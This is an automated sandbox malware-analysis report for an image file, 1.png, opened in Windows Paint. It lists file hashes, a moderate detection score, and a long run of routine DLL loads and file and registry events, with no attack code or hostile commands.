Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.png

Overview

General Information

Sample name:1.png
Analysis ID:1586015
MD5:8df4ac24ea37d95679dda12bbdf3d021
SHA1:8c7881e04b2ec0e4f352e531ad02a31e79a36b53
SHA256:1417811e6df4fa655aa70a388473d57e529526674011fd60a1ea56b86684118b
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Creates files inside the system directory
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w11x64_office
  • mspaint.exe (PID: 6668 cmdline: mspaint.exe "C:\Users\user\Desktop\1.png" MD5: ED77A474C513D8F7A1481EEB1C978AAB)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 1.pngReversingLabs: Detection: 21%
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeFile created: C:\Windows\Debug\WIAJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeFile created: C:\Windows\Debug\WIA\wiatrace.logJump to behavior
Source: classification engineClassification label: mal48.winPNG@1/1@1/0
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1.pngReversingLabs: Detection: 21%
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: propsys.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: basepaint.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: painttools.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: pgs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: enumhelper.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: imageprocessing.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: platformhelpers.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: provenancehelper.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: restartrecovery.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: reporting.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: aistore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: mfc140u.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: concrt140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: reporting.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: platformhelpers.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: reporting.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: reporting.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: provenancesdk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: reporting.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: featurestaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: watermarker.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: libcrypto-3-x64.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: winrttracing.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: directxdatabasehelper.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: sti.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: wiatrace.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: sxs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.graphics.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: cfgmgr32.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.energy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: msftedit.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: globinputhost.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windows.web.http.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: threadpoolwinrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: pfclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeFile opened: C:\Windows\SYSTEM32\msftedit.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Users\user\Desktop\1.png VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformationJump to behavior
